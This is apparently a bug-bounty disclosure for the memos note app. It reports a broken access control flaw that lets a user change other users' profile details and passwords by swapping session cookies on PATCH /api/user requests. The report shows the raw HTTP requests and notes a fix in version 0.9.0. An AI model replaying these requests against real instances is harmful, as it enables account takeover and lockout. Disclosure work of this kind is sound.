A user can update information / password from other users in usememos/memos

Valid

Reported on

Dec 21st 2022

Description

A user (neither admin nor host) can modify nickname, username and email from other users without permission, being a normal user.

Steps to Reproduce

  1. Login as user A (here, called "ileana.maricel", HOST role).
  2. In another browser login as user B (called "ileana.mariceel", USER role). Copy the Cookie.
  3. With user A, go to Setting --> Update Information.
  4. Change nickname, username and/or email.
  5. When selecting Save, intercept the request with a web proxy and modify the cookie for User B's cookie value. Also modify the path id, including the User B's ID to avoid errors:
PATCH /api/user/2 HTTP/1.1
Host: localhost:5230
Content-Type: application/json
Cookie: memos_session=MTY3MTU3OTA0MXxEdi1CQkFFQ180SUFBUkFCRUFBQUh2LUNBQUVHYzNSeWFXNW5EQWtBQjNWelpYSXRhV1FEYVc1MEJBSUFCQT09fOcAjJ2GPp5-cAXssL0lYKwcUk2hOR1JVz35py1Cn8sK
Connection: close

{"id":1,"nickname":"ileana.maricel.edited",
"username":"ileana.maricel.username.modified","email":"test@test.com"}
  1. Send the request and see information has changed for user A.

Figure 1

  1. Also you can change the password of other users! To do this, go to Setting --> Change Password in User A session.
  2. Enter the required values and select Save, intercepting the request.
  3. Change the cookie by the one from User B.
  4. Also change path id by 2, which is User B's id, to avoid errors when validations take place.
  5. Send the request (the endpoint is the same for updating info) and see password has been changed for User A.
PATCH /api/user/2 HTTP/1.1
Host: localhost:5230
Content-Type: application/json
Cookie: memos_session=MTY3MTU3OTA0MXxEdi1CQkFFQ180SUFBUkFCRUFBQUh2LUNBQUVHYzNSeWFXNW5EQWtBQjNWelpYSXRhV1FEYVc1MEJBSUFCQT09fOcAjJ2GPp5-cAXssL0lYKwcUk2hOR1JVz35py1Cn8sK
Connection: close

{"id":1,"password":"Changed"}

Figure 2

  1. Log out from User A and try to login with original credentials for this same user: it is not possible anymore.

Figure 3

Impact

This vulnerability affects Integrity: information from other users is changed without consent. It also affects Confidentiality inherently because the access control is broken, allowing a user to modify a resource which is not owned by him; and finally, it can affect Availability because if a user modifies not only usernames, he also modifies the password of other users!, then the victim user will not be able to login unless he guesses which username / password has.

We are processing your report and will contact the usememos/memos team within 24 hours. 20 days ago
We have contacted a member of the usememos/memos team and are waiting to hear back 19 days ago
usememos/memos maintainer validated this vulnerability 19 days ago
Ileana Barrionuevo has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
STEVEN marked this as fixed in 0.9.0 with commit dca35b 17 days ago
STEVEN has been awarded the fix bounty
This vulnerability has been assigned a CVE
STEVEN published this vulnerability 17 days ago
to join this conversation